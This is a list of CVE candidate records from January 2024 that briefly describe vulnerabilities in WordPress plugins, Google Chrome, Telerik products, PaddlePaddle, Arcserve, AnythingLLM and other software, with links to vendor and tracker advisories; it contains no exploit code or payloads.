CVE 2024 834 Candidate The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784 | URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/trunk/modules/price-table/widgets/price-table.php#L784 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve Assigned (20240123)
CVE 2024 833 Candidate In Telerik Test Studio versions prior to v2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system. MISC:https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability | URL:https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability | MISC:https://www.telerik.com/teststudio | URL:https://www.telerik.com/teststudio Assigned (20240123)
CVE 2024 832 Candidate In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system. MISC:https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability | URL:https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability | MISC:https://www.telerik.com/products/reporting.aspx | URL:https://www.telerik.com/products/reporting.aspx Assigned (20240123)
CVE 2024 831 Candidate Vault and Vault Enterprise (“Vault”) may expose sensitive information when enabling an audit device which specifies the `log_raw` option, which may log sensitive information to other audit devices, regardless of whether they are configured to use `log_raw`. CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0005/ | MISC:https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration | URL:https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration | MISC:https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311 | URL:https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311 Assigned (20240123)
CVE 2024 830 Candidate The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0. This is due to missing or incorrect nonce validation on several ajax actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. As a result, they may modify comment form fields and update plugin settings. MISC:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php | URL:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve Assigned (20240123)
CVE 2024 829 Candidate The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0. This is due to missing or incorrect capability checks on several ajax actions. This makes it possible for authenticated attackers, with subscriber access or higher, to invoke those actions. As a result, they may modify comment form fields and update plugin settings. MISC:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php | URL:https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve Assigned (20240123)
CVE 2024 828 Candidate The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with subscriber access or higher, to delete, retrieve, or modify post metadata, retrieve posts contents of protected posts, modify conversion data and delete article audio. MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php | URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve Assigned (20240123)
CVE 2024 827 Candidate The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php | URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve Assigned (20240123)
CVE 2024 825 Candidate The Vimeography: Vimeo Video Gallery WordPress Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.3.2 via deserialization of untrusted input via the vimeography_duplicate_gallery_serialized in the duplicate_gallery function. This makes it possible for authenticated attackers attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816 | URL:https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve Assigned (20240123)
CVE 2024 824 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php | URL:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve Assigned (20240123)
CVE 2024 823 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php | URL:https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve Assigned (20240123)
CVE 2024 822 Candidate An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command. MISC:RHBZ#2258509 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258509 | MISC:RHSA-2024:0934 | URL:https://access.redhat.com/errata/RHSA-2024:0934 | MISC:https://access.redhat.com/security/cve/CVE-2024-0822 | URL:https://access.redhat.com/security/cve/CVE-2024-0822 | MISC:https://github.com/oVirt/ovirt-engine/pull/914 | URL:https://github.com/oVirt/ovirt-engine/pull/914 Assigned (20240123)
CVE 2024 821 Candidate The Cost of Goods Sold (COGS): Cost & Profit Calculator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'section' parameter in all versions up to, and including, 3.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve Assigned (20240123)
CVE 2024 820 Candidate The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/ | URL:https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/ Assigned (20240123)
CVE 2024 819 Candidate Improper initialization of default settings in TeamViewer Remote Client prior version 15.51.5 for Windows, Linux and macOS, allow a low privileged user to elevate privileges by changing the personal password setting and establishing a remote connection to a logged-in admin account. MISC:https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/ | URL:https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/ Assigned (20240123)
CVE 2024 818 Candidate Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6 MISC:https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9 | URL:https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9 Assigned (20240123)
CVE 2024 817 Candidate Command injection in IrGraph.draw in paddlepaddle/paddle 2.6.0 MISC:https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3 | URL:https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3 Assigned (20240123)
CVE 2024 815 Candidate Command injection in paddle.utils.download._wget_download (bypass filter) in paddlepaddle/paddle 2.6.0 MISC:https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350 | URL:https://huntr.com/bounties/83bf8191-b259-4b24-8ec9-0115d7c05350 Assigned (20240123)
CVE 2024 814 Candidate Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1463935 | URL:https://crbug.com/1463935 Assigned (20240123)
CVE 2024 813 Candidate Use after free in Reading Mode in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1477151 | URL:https://crbug.com/1477151 Assigned (20240123)
CVE 2024 812 Candidate Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1484394 | URL:https://crbug.com/1484394 Assigned (20240123)
CVE 2024 811 Candidate Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:http://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1494490 | URL:https://crbug.com/1494490 Assigned (20240123)
CVE 2024 810 Candidate Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1496250 | URL:https://crbug.com/1496250 Assigned (20240123)
CVE 2024 809 Candidate Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1497985 | URL:https://crbug.com/1497985 Assigned (20240123)
CVE 2024 808 Candidate Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1504936 | URL:https://crbug.com/1504936 Assigned (20240123)
CVE 2024 807 Candidate Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1505080 | URL:https://crbug.com/1505080 Assigned (20240123)
CVE 2024 806 Candidate Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1505176 | URL:https://crbug.com/1505176 Assigned (20240123)
CVE 2024 805 Candidate Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1514925 | URL:https://crbug.com/1514925 Assigned (20240123)
CVE 2024 804 Candidate Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-3f7345570a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMI6GXFONZV6HE3BPZO3AP6GUVQLG4JQ/ | FEDORA:FEDORA-2024-e42978d12c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXDSGAFQD4BDB4IB2O4ZUSHC3JCVQEKC/ | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_23.html | MISC:https://crbug.com/1515137 | URL:https://crbug.com/1515137 Assigned (20240123)
CVE 2024 802 Candidate Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to read arbitrary information from a target product or execute malicious code on a target product by sending a specially crafted packet. MISC:https://jvn.jp/vu/JVNVU99690199/ | URL:https://jvn.jp/vu/JVNVU99690199/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf | URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf Assigned (20240123)
CVE 2024 801 Candidate A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll. MISC:https://www.tenable.com/security/research/tra-2024-07 | URL:https://www.tenable.com/security/research/tra-2024-07 Assigned (20240122)
CVE 2024 800 Candidate A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet. MISC:https://www.tenable.com/security/research/tra-2024-07 | URL:https://www.tenable.com/security/research/tra-2024-07 Assigned (20240122)
CVE 2024 799 Candidate An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin. MISC:https://www.tenable.com/security/research/tra-2024-07 | URL:https://www.tenable.com/security/research/tra-2024-07 Assigned (20240122)
CVE 2024 798 Candidate A user with a `default` role given to them by the admin can sent `DELETE` HTTP requests to `remove-folder` and `remove-document` to delete folders and source files from the instance even when their role should explicitly not allow this action on the system. MISC:https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733 | URL:https://github.com/mintplex-labs/anything-llm/commit/d5cde8b7c27a47ab45b05b441db16751537f1733 | MISC:https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c | URL:https://huntr.com/bounties/607f03a0-ab4d-4905-b253-3d28bbbd363c Assigned (20240122)
CVE 2024 797 Candidate The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use. MISC:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve Assigned (20240122)
CVE 2024 796 Candidate The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve Assigned (20240122)
CVE 2024 795 Candidate If an attacked was given access to an instance with the admin or manager role there is no backend authentication that would prevent the attacked from creating a new user with an `admin` role and then be able to use this new account to have elevated privileges on the instance MISC:https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564 | URL:https://github.com/mintplex-labs/anything-llm/commit/9a237db3d1f66cdbcf5079599258f5fb251c5564 | MISC:https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec | URL:https://huntr.com/bounties/f69e3307-7b44-4776-ac60-2990990723ec Assigned (20240122)
CVE 2024 794 Candidate Certain HP LaserJet Pro, HP Enterprise LaserJet, and HP LaserJet Managed Printers are potentially vulnerable to Remote Code Execution due to buffer overflow when rendering fonts embedded in a PDF file. MISC:https://support.hp.com/us-en/document/ish_10174031-10198670-16 | URL:https://support.hp.com/us-en/document/ish_10174031-10198670-16 Assigned (20240122)
CVE 2024 792 Candidate The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.0.1 due to insufficient input sanitization and output escaping on RSS feed content. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49 | URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L49 | MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78 | URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/trunk/includes/shortcodes/feed.php#L78 | MISC:https://plugins.trac.wordpress.org/changeset/3026377/ | URL:https://plugins.trac.wordpress.org/changeset/3026377/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8c043c-e347-4dc8-8a72-943a7e6c4394?source=cve Assigned (20240122)
CVE 2024 791 Candidate The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms. MISC:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php | URL:https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve Assigned (20240122)
